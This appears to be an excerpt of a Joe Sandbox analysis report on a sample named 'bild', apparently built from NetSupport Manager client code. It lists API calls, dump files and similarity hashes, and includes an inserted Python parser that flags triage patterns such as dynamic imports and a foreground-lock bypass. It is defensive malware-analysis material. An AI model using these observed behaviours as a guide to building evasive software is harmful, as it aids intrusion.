• Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
• Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
• Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
• Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
APIs
• GetWindowTextA.USER32(?,?,00000050), ref: 11025176
• _strncat.LIBCMT ref: 1102518B
• SetWindowTextA.USER32(?,?), ref: 11025198
  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
• GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
• GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
• SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
• SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
• SetFocus.USER32(?), ref: 11025265
  • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
• String ID:
• API String ID: 3832070631-0
• Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
• Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
• Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
• Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
APIs
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,A1BC2D8B,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
  • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000), ref: 110760A7
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000), ref: 110760FC
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,A1BC2D8B,00000000,00000001,00000000,00000000), ref: 11076105
• LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
• GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
• SetLastError.KERNEL32(00000078), ref: 110575F4
• FreeLibrary.KERNEL32(00000000), ref: 110575FF
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
• String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
• API String ID: 3780373956-3165951319
• Opcode ID: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
• Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
• Opcode Fuzzy Hash: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
• Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
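Each API line in these per-function listings carries the same fields: API name and module, the argument values the disassembler could recover (a `?` where it could not), and the call-site address after `ref:`; lines marked `Part of subcall function` belong to a callee rather than the function itself. The following Python parser is an added example and is not part of the Joe Sandbox report or of the analysed sample's code. It turns such lines into records, decodes two raw arguments that appear in the blocks above against their Windows SDK names (SetLastError(00000078) is ERROR_CALL_NOT_IMPLEMENTED, the value a compatibility wrapper sets when an optional export such as WTSGetActiveConsoleSessionId is missing from the loaded kernel32.dll; SystemParametersInfoA(00002001, …) is SPI_SETFOREGROUNDLOCKTIMEOUT, the setting that gates SetForegroundWindow), and flags the call combinations a triage analyst would want surfaced. The sample input is a constructed mix of lines copied from several blocks on this page; the pattern names and the constant table are the example's own choices, not anything the report defines.

```python
"""Parse Joe Sandbox per-function API listings into structured records."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed sample input: API lines copied from several function blocks of the
# report, with the report's leading indentation trimmed. Callee lines keep the
# two-space indent the report gives them.
SAMPLE = """\
• SetForegroundWindow.USER32(00000000), ref: 1115F162
• SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
• LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
• GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
• SetLastError.KERNEL32(00000078), ref: 110575F4
• FreeLibrary.KERNEL32(00000000), ref: 110575FF
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
• _strncat.LIBCMT ref: 1102518B
"""

# One report line: "• [Part of subcall function ADDR: ]NAME.MODULE[(ARGS)][,] ref: ADDR"
# The argument list and the comma before "ref:" are both optional in the report.
_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function\s+([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str] = field(default_factory=list)  # raw tokens, "?" when unrecovered
    ref: int = 0                                   # call-site address
    callee: Optional[int] = None                   # set for "Part of subcall function" lines


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for one listing line, or None for headers and other text."""
    m = _LINE.match(line)
    if not m:
        return None
    callee, api, module, args, ref = m.groups()
    return ApiCall(
        api=api,
        module=module,
        args=[a.strip() for a in args.split(",")] if args else [],
        ref=int(ref, 16),
        callee=int(callee, 16) if callee else None,
    )


def parse_block(text: str) -> List[ApiCall]:
    """Parse every API line of a block; non-matching lines are skipped."""
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c]


# Argument values the report prints raw, mapped to their Windows SDK names.
# Keyed by (API name, zero-based argument index). Example's own table.
_CONSTANTS = {
    ("SetLastError", 0): {0x78: "ERROR_CALL_NOT_IMPLEMENTED"},
    ("SystemParametersInfoA", 0): {0x2001: "SPI_SETFOREGROUNDLOCKTIMEOUT"},
    ("SystemParametersInfoW", 0): {0x2001: "SPI_SETFOREGROUNDLOCKTIMEOUT"},
}


def decode_arg(api: str, index: int, raw: str) -> Optional[str]:
    """Map a hex argument to its SDK name; None for unknown values or '?'."""
    try:
        value = int(raw, 16)
    except ValueError:
        return None
    return _CONSTANTS.get((api, index), {}).get(value)


def flag_patterns(calls: List[ApiCall]) -> Set[str]:
    """Name the call combinations worth a second look in triage (example's own labels)."""
    direct = {c.api for c in calls if c.callee is None}
    via_callee = {c.api for c in calls if c.callee is not None}
    flags: Set[str] = set()
    loaders = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
    if direct & loaders and "GetProcAddress" in direct:
        flags.add("dynamic_import")           # resolves exports at run time
    lock = [c for c in calls if c.api.startswith("SystemParametersInfo") and c.args
            and decode_arg(c.api, 0, c.args[0]) == "SPI_SETFOREGROUNDLOCKTIMEOUT"]
    if lock and "SetForegroundWindow" in direct:
        flags.add("foreground_lock_bypass")   # adjusts the lock that gates SetForegroundWindow
    if {"MessageBoxA", "ExitProcess"} <= via_callee:
        flags.add("messagebox_then_exit")     # fatal-error handler reached through a callee
    return flags


if __name__ == "__main__":
    for call in parse_block(SAMPLE):
        names = [decode_arg(call.api, i, a) or a for i, a in enumerate(call.args)]
        where = f"callee {call.callee:08X}" if call.callee else "direct"
        print(f"{call.ref:08X} {where:16} {call.api}.{call.module}({', '.join(names)})")
    print("flags:", sorted(flag_patterns(parse_block(SAMPLE))))
```

Feeding a whole exported report through `parse_block` works block by block because `parse_api_line` ignores the `Strings`, `Memory Dump Source` and `Similarity` headers; split the text on the `APIs` header first to keep one function per record set.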
APIs
  • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
  • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
  • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
  • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
  • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
• GetWindowLongA.USER32(?,000000EC), ref: 110931C9
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
• GetWindowLongA.USER32(?,000000F0), ref: 11093220
• SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 3136964118-2830328467
• Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
• Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
• Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
• Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 111370A6
                                                                                      • _free.LIBCMT ref: 111370DD
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • _free.LIBCMT ref: 1113716D
                                                                                        • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                      • _free.LIBCMT ref: 1113713E
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
• String ID: *HelpReqServer$Client
• API String ID: 1390041139-3616015116
• Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
• Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
• Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
• Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
APIs
• PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
  • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
• Beep.KERNEL32(00000000,00000000), ref: 11143415
• MessageBeep.USER32(00000000), ref: 11143427
• MessageBeep.USER32(-00000010), ref: 1114343B
• MessageBeep.USER32(00000000), ref: 1114345D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Beep$Message$PlaySound__isdigit_l
• String ID: 1000,50
• API String ID: 3904670044-1941404556
• Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
• Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
• Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
• Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
APIs
• GetForegroundWindow.USER32(75BF7AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
• GetCursorPos.USER32(110BFEBC), ref: 110B9026
  • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
• PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
• ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
• SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
• LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
• SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Cursor$RectWindow$ClientForegroundLoadScreen
• String ID:
• API String ID: 3235510773-0
• Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
• Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
• Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
• Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
APIs
• _memset.LIBCMT ref: 1101D0FE
• LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
• LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
• RegisterClassExA.USER32(00000030), ref: 1101D181
• GetLastError.KERNEL32 ref: 1101D187
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Load$ClassCursorErrorIconLastRegister_memset
• String ID: 0
• API String ID: 430917334-4108050209
• Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
• Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
• Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
• Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
APIs
• LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
• GetSubMenu.USER32(00000000,00000000), ref: 11003343
• DestroyMenu.USER32(00000000), ref: 11003372
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
• Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
• Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
• Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
• Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
APIs
• OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
• CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
• GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
• String ID:
• API String ID: 180989782-0
• Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
• Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
• Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
• Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
APIs
• SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
• CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                      • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$EventObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 2857295742-0
                                                                                      • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                      • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                      • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                      • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                      APIs
                                                                                      • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                        • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                      • EqualRect.USER32(?,?), ref: 1107713C
                                                                                      • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                      • m_hWnd, xrefs: 11077177
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$DeferEqualPointsRect
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2754115966-2830328467
